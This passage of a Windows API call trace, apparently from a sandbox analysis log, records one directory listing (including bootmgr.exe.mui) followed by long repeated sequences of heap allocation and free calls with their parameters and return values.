ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.849] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.849] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.849] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.849] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.850] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: 